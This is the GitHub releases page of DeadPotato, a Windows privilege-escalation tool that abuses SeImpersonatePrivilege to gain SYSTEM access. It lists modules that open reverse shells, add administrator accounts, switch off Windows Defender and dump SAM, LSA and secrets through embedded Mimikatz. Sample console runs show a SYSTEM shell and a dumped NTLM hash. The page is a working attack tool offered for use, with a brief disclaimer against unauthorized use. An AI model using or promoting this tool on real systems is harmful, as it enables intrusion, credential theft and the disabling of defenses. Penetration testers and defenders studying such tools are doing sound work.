Releases: lypd0/DeadPotato
Releases · lypd0/DeadPotato
Version 1.2
DeadPotato - Version 1.2
This version includes the following changes:
- sharphound: Attempts to collect domain data for BloodHound. (NOTE: This will write SharpHound to disk!)
- mimi <sam/lsa/secrets>: Added LSA & Secrets dump with Mimikatz.
- Added banner compatibility for win10.
Usage of this program in an unauthorized context is strictly forbidden. The author(s) take no responsibility over the misuse of this DeadPotato or any of it's components.
Choose among many modules! (-cmd, -newadmin, -rev, -exe, ...).
Here is an example with the -sharphound module!
C:\Users\lypd0> DeadPotato.exe -sharphound
_.--,_
.-' '-. _ _
/ \ | \ _ _ _||_) _ _|_ _ _|_ _
' _. ' |_/(/_(_|(_|| (_) |_(_| |_(_)
\ """" / ~( Open Source @ github.com/lypd0
'=,,_ =\__ ` & -= Version: 1.2 =-
"" ""'; \\\
_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_
(*) Attempting to write XaOAZsTO.exe (SharpHound) in the current directory...
(+) File written. Attempting to run enumeration...
(*) Initiating procedure as NT AUTHORITY\NETWORK SERVICE
(+) Is impersonation possible in current context? YES
(+) Currently running as user: NT AUTHORITY\SYSTEM
(+) Elevated process started with PID 3640
-={ OUTPUT BELOW }=-
<..SNIP..>
2024-08-04T08:08:05.4023630-07:00|INFORMATION|SharpHound Enumeration Completed at 8:08 AM on 8/4/2024! Happy Graphing!
(+) Removing SharpHound and exiting.
| Binary | MD5 Checksum |
|---|---|
| DeadPotato-NET4.exe | C76954078004EDD81B1836A09F9D0D66 |
| mimikatz.exe (embedded) | E930B05EFE23891D19BC354A4209BE3E |
| [SharpHound.exe] | AAF1146EC9C633C4C3FBE8091F1596D8 |
Version 1.1
DeadPotato - Version 1.1
This version includes the following functions:
- mimisam: Attempts to dump the SAM database with Mimikatz. (NOTE: This will write mimikatz to disk!)
- defender: Either enables or disables Windows Defender's real-time protection.
Usage of this program in an unauthorized context is strictly forbidden. The author(s) take no responsibility over the misuse of this DeadPotato or any of it's components.
Choose among many modules! (-cmd, -newadmin, -rev, -exe, ...).
Here is an example with the -mimisam module!
PS C:\Users\john> .\DeadPotato -mimisam
⠀⢀⣠⣤⣤⣄⡀⠀ _ _
⣴⣿⣿⣿⣿⣿⣿⣦ | \ _ _ _||_) _ _|_ _ _|_ _
⣿⣿⣿⣿⣿⣿⣿⣿ |_/(/_(_|(_|| (_) |_(_| |_(_)
⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/lypd0
⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: 1.1 =-
⠀⠀⠀⠈⠁⠀⠀⠀
_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_
(*) Attempting to write vs1wGHKx.exe (mimikatz) in the current directory...
(+) File written. Attempting to dump SAM...
(*) Initiating procedure as NT AUTHORITY\NETWORK SERVICE
(+) Is impersonation possible in current context? YES
(+) Currently running as user: NT AUTHORITY\SYSTEM
(+) Elevated process started with PID 10436
-={ OUTPUT BELOW }=-
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::sam
<..SNIP..>
User : john
Hash NTLM: ce17d7c3576091dfda645a92ca1b53c3
| Binary | MD5 Checksum |
|---|---|
| DeadPotato-NET4.exe | 3E44D727CF75C841DC502EE2733491A6 |
| mimikatz.exe (embedded) | E930B05EFE23891D19BC354A4209BE3E |
Version b1.0
DeadPotato - Version b1.0
This is the first released version of DeadPotato, customized version of GodPotato by BeichenDream.
This version includes the following functions:
- cmd: Execute a command as NT AUTHORITY\SYSTEM.
- rev: Attempts to establish a reverse shell connection to the provided host
- exe: Execute a program with NT AUTHORITY\SYSTEM privileges.
- newadmin: Create a new administrator user on the local system.
- shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)
This is a privilege escalation utility that abuses the SeImpersonatePrivilege rights assigned to the current context, allowing the user to achieve NT AUTHORITY\SYSTEM level access seamlessly.
Usage of this program in an unauthorized context is strictly forbidden. The author(s) take no responsibility over the misuse of this DeadPotato or any of it's components.
Choose among many modules! (-cmd, -newadmin, -rev, -exe, ...).
Here is an example with the -shell module!
PS C:\Users\john> .\DeadPotato -shell
⠀⢀⣠⣤⣤⣄⡀⠀ _ _
⣴⣿⣿⣿⣿⣿⣿⣦ | \ _ _ _||_) _ _|_ _ _|_ _
⣿⣿⣿⣿⣿⣿⣿⣿ |_/(/_(_|(_|| (_) |_(_| |_(_)
⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/lypd0
⠙⠛⢻⣷⣾⡟⠛⠋ -= Version b1.0 =-
⠀⠀⠀⠈⠁⠀⠀⠀
_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_
Interactive mode enabled, write "quit" to exit.
* DeadPotato * C:\Users\john> whoami
nt authority\system
* DeadPotato * C:\Users\john> cd ..
* DeadPotato * C:\Users> dir
Volume in drive C is OS
Volume Serial Number is D34D-PTT0
Directory of C:\Users
03/02/2024 19:36 <DIR> .
23/05/2024 12:46 <DIR> Public
31/07/2024 03:08 <DIR> john
0 File(s)
0 bytes
3 Dir(s) 999,999,999,999 bytes free
| Binary | MD5 Checksum |
|---|---|
| DeadPotato-NET4.exe | 2D943071108A5AB2DDE93FDCEF5E00F8 |